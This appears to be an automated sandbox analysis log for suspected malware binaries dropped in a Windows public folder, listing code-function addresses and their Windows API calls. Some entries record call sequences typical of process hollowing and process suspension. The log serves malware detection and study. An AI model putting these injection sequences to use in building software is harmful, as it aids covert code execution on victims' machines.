Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02847966 NtAllocateVirtualMemory,	9_2_02847966
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152AD58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	9_2_152AD58F
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152ABB35 OpenProcess,NtResumeProcess,CloseHandle,	9_2_152ABB35
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152ABB09 OpenProcess,NtSuspendProcess,CloseHandle,	9_2_152ABB09
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152A32D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,	9_2_152A32D2
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError,	10_2_00007FF683F87FF8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	10_2_00007FF683F88114
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683FA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	10_2_00007FF683FA1538
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	10_2_00007FF683F73D94
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F8898C NtQueryInformationToken,	10_2_00007FF683F8898C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F889E4 NtQueryInformationToken,NtQueryInformationToken,	10_2_00007FF683F889E4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	10_2_00007FF683F888C0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	10_2_00007FF683F9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError,	11_2_00007FF683F87FF8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	11_2_00007FF683F88114
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683FA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	11_2_00007FF683FA1538
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	11_2_00007FF683F73D94
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F8898C NtQueryInformationToken,	11_2_00007FF683F8898C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F889E4 NtQueryInformationToken,NtQueryInformationToken,	11_2_00007FF683F889E4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	11_2_00007FF683F888C0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	11_2_00007FF683F9BCF0
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_145632D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	24_2_145632D2
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1456BB09 OpenProcess,NtSuspendProcess,CloseHandle,	24_2_1456BB09
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1456BB35 OpenProcess,NtResumeProcess,CloseHandle,	24_2_1456BB35
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A6C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	24_2_02A6C4DC
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A67968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	24_2_02A67968
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A6C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	24_2_02A6C3F6
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A6C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	24_2_02A6C3F8
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A6C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	24_2_02A6C368
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A67AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	24_2_02A67AC0
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A67966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	24_2_02A67966
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A67F46 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,	24_2_02A67F46
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A67F48 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,	24_2_02A67F48

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF683F75240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,

3_2_00007FF683F75240

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF683F84224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,

3_2_00007FF683F84224

Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152A67B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,		9_2_152A67B9
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_145667B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,		24_2_145667B4

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows \System32			Jump to behavior

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F85554	3_2_00007FF683F85554
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F84224	3_2_00007FF683F84224
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F7AA54	3_2_00007FF683F7AA54
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F80A6C	3_2_00007FF683F80A6C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F837D8	3_2_00007FF683F837D8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683FA1538	3_2_00007FF683FA1538
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F9D9D0	3_2_00007FF683F9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F781D4	3_2_00007FF683F781D4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F78DF8	3_2_00007FF683F78DF8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F7CE10	3_2_00007FF683F7CE10
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F72220	3_2_00007FF683F72220
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F9AA30	3_2_00007FF683F9AA30
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F74A30	3_2_00007FF683F74A30
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F75240	3_2_00007FF683F75240
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F77650	3_2_00007FF683F77650
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F7D250	3_2_00007FF683F7D250
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F79E50	3_2_00007FF683F79E50
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F7E680	3_2_00007FF683F7E680
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F9EE88	3_2_00007FF683F9EE88
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F76EE4	3_2_00007FF683F76EE4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F97F00	3_2_00007FF683F97F00
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F7372C	3_2_00007FF683F7372C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F79B50	3_2_00007FF683F79B50
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F75B70	3_2_00007FF683F75B70
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F73F90	3_2_00007FF683F73F90
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F9AFBC	3_2_00007FF683F9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F76BE0	3_2_00007FF683F76BE0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F73410	3_2_00007FF683F73410
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F72C48	3_2_00007FF683F72C48
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F87854	3_2_00007FF683F87854
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F9AC4C	3_2_00007FF683F9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F71884	3_2_00007FF683F71884
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F818D4	3_2_00007FF683F818D4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F7B0D8	3_2_00007FF683F7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F78510	3_2_00007FF683F78510
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F77D30	3_2_00007FF683F77D30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F85554	5_2_00007FF683F85554
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F84224	5_2_00007FF683F84224
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F7AA54	5_2_00007FF683F7AA54
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F80A6C	5_2_00007FF683F80A6C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F837D8	5_2_00007FF683F837D8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683FA1538	5_2_00007FF683FA1538
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F9D9D0	5_2_00007FF683F9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F781D4	5_2_00007FF683F781D4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F78DF8	5_2_00007FF683F78DF8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F7CE10	5_2_00007FF683F7CE10
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F72220	5_2_00007FF683F72220
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F9AA30	5_2_00007FF683F9AA30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F74A30	5_2_00007FF683F74A30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F75240	5_2_00007FF683F75240
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F77650	5_2_00007FF683F77650
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F7D250	5_2_00007FF683F7D250
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F79E50	5_2_00007FF683F79E50
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F7E680	5_2_00007FF683F7E680
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F9EE88	5_2_00007FF683F9EE88
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F76EE4	5_2_00007FF683F76EE4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F97F00	5_2_00007FF683F97F00
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F7372C	5_2_00007FF683F7372C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F79B50	5_2_00007FF683F79B50
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F75B70	5_2_00007FF683F75B70
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F73F90	5_2_00007FF683F73F90
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F9AFBC	5_2_00007FF683F9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F76BE0	5_2_00007FF683F76BE0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F73410	5_2_00007FF683F73410
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F72C48	5_2_00007FF683F72C48
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F87854	5_2_00007FF683F87854
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F9AC4C	5_2_00007FF683F9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F71884	5_2_00007FF683F71884
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F818D4	5_2_00007FF683F818D4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F7B0D8	5_2_00007FF683F7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F78510	5_2_00007FF683F78510
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F77D30	5_2_00007FF683F77D30
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66596F020	6_2_00007FF66596F020
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665892F38	6_2_00007FF665892F38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66596CCB8	6_2_00007FF66596CCB8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665993800	6_2_00007FF665993800
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66596C120	6_2_00007FF66596C120
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66596BC10	6_2_00007FF66596BC10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658EC6D0	6_2_00007FF6658EC6D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658FC6F8	6_2_00007FF6658FC6F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659885EC	6_2_00007FF6659885EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658905E0	6_2_00007FF6658905E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594C630	6_2_00007FF66594C630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E8630	6_2_00007FF6658E8630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B8570	6_2_00007FF6658B8570
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665954538	6_2_00007FF665954538
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E655C	6_2_00007FF6658E655C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659785A8	6_2_00007FF6659785A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D2580	6_2_00007FF6658D2580
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591E57C	6_2_00007FF66591E57C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659648C4	6_2_00007FF6659648C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659608C8	6_2_00007FF6659608C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590E844	6_2_00007FF66590E844
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665972854	6_2_00007FF665972854
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659027D0	6_2_00007FF6659027D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590C7F0	6_2_00007FF66590C7F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659307D0	6_2_00007FF6659307D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665976750	6_2_00007FF665976750
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665964274	6_2_00007FF665964274
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F6280	6_2_00007FF6658F6280
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A227C	6_2_00007FF6658A227C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DE29C	6_2_00007FF6658DE29C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DC1D0	6_2_00007FF6658DC1D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590A1E8	6_2_00007FF66590A1E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594821C	6_2_00007FF66594821C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659941F8	6_2_00007FF6659941F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A0140	6_2_00007FF6658A0140
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665888170	6_2_00007FF665888170
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F24D4	6_2_00007FF6658F24D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659684D8	6_2_00007FF6659684D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590E4F0	6_2_00007FF66590E4F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658944E0	6_2_00007FF6658944E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66588C520	6_2_00007FF66588C520
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658FC450	6_2_00007FF6658FC450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658FA450	6_2_00007FF6658FA450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D8484	6_2_00007FF6658D8484
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C64A8	6_2_00007FF6658C64A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665918488	6_2_00007FF665918488
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665960490	6_2_00007FF665960490
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659143D0	6_2_00007FF6659143D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A4410	6_2_00007FF6658A4410
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66599842F	6_2_00007FF66599842F
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66596E430	6_2_00007FF66596E430
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66588A424	6_2_00007FF66588A424
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665908414	6_2_00007FF665908414
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665916374	6_2_00007FF665916374
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66596234C	6_2_00007FF66596234C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658CE3A0	6_2_00007FF6658CE3A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E0398	6_2_00007FF6658E0398
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BEED4	6_2_00007FF6658BEED4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665886EF4	6_2_00007FF665886EF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A8F1C	6_2_00007FF6658A8F1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665964E58	6_2_00007FF665964E58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665968EAC	6_2_00007FF665968EAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665962D6C	6_2_00007FF665962D6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F6D7C	6_2_00007FF6658F6D7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AEDA4	6_2_00007FF6658AEDA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594511C	6_2_00007FF66594511C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DD094	6_2_00007FF6658DD094
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C107C	6_2_00007FF6658C107C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66589B09C	6_2_00007FF66589B09C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665881030	6_2_00007FF665881030
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B4F90	6_2_00007FF6658B4F90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665924F94	6_2_00007FF665924F94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D4B30	6_2_00007FF6658D4B30
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665974A58	6_2_00007FF665974A58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66596AA58	6_2_00007FF66596AA58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665954A40	6_2_00007FF665954A40
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665906A84	6_2_00007FF665906A84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590EA7C	6_2_00007FF66590EA7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595A9F0	6_2_00007FF66595A9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658EE9F0	6_2_00007FF6658EE9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E09EC	6_2_00007FF6658E09EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590AA00	6_2_00007FF66590AA00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665882940	6_2_00007FF665882940
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D8990	6_2_00007FF6658D8990
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E6984	6_2_00007FF6658E6984
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665978CF4	6_2_00007FF665978CF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DCD10	6_2_00007FF6658DCD10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665898D00	6_2_00007FF665898D00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665912CF8	6_2_00007FF665912CF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D8D2C	6_2_00007FF6658D8D2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E2D18	6_2_00007FF6658E2D18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665958C58	6_2_00007FF665958C58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591CCA8	6_2_00007FF66591CCA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658FCC80	6_2_00007FF6658FCC80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66598CC8C	6_2_00007FF66598CC8C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F8BD4	6_2_00007FF6658F8BD4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66588AC08	6_2_00007FF66588AC08
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658CCBFC	6_2_00007FF6658CCBFC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D0C28	6_2_00007FF6658D0C28
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A4B68	6_2_00007FF6658A4B68
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665936B94	6_2_00007FF665936B94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590F6D8	6_2_00007FF66590F6D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595D6DC	6_2_00007FF66595D6DC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C5648	6_2_00007FF6658C5648
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665955660	6_2_00007FF665955660
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665963638	6_2_00007FF665963638
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AD660	6_2_00007FF6658AD660
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66593D6A0	6_2_00007FF66593D6A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665937678	6_2_00007FF665937678
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D76B0	6_2_00007FF6658D76B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665967678	6_2_00007FF665967678
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E55F0	6_2_00007FF6658E55F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66588F610	6_2_00007FF66588F610
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659095FC	6_2_00007FF6659095FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B156C	6_2_00007FF6658B156C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BB58C	6_2_00007FF6658BB58C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665959580	6_2_00007FF665959580
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D58CC	6_2_00007FF6658D58CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591D858	6_2_00007FF66591D858
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665953874	6_2_00007FF665953874
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591184C	6_2_00007FF66591184C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E7890	6_2_00007FF6658E7890
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C17D4	6_2_00007FF6658C17D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F77C8	6_2_00007FF6658F77C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658ED7F0	6_2_00007FF6658ED7F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665933820	6_2_00007FF665933820
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66589F800	6_2_00007FF66589F800
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A1830	6_2_00007FF6658A1830
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665903760	6_2_00007FF665903760
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D9790	6_2_00007FF6658D9790
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66589B788	6_2_00007FF66589B788
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E92C4	6_2_00007FF6658E92C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66588F2C0	6_2_00007FF66588F2C0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DD2C0	6_2_00007FF6658DD2C0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F92D8	6_2_00007FF6658F92D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665915318	6_2_00007FF665915318
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595D2B4	6_2_00007FF66595D2B4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665935290	6_2_00007FF665935290
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D11C8	6_2_00007FF6658D11C8
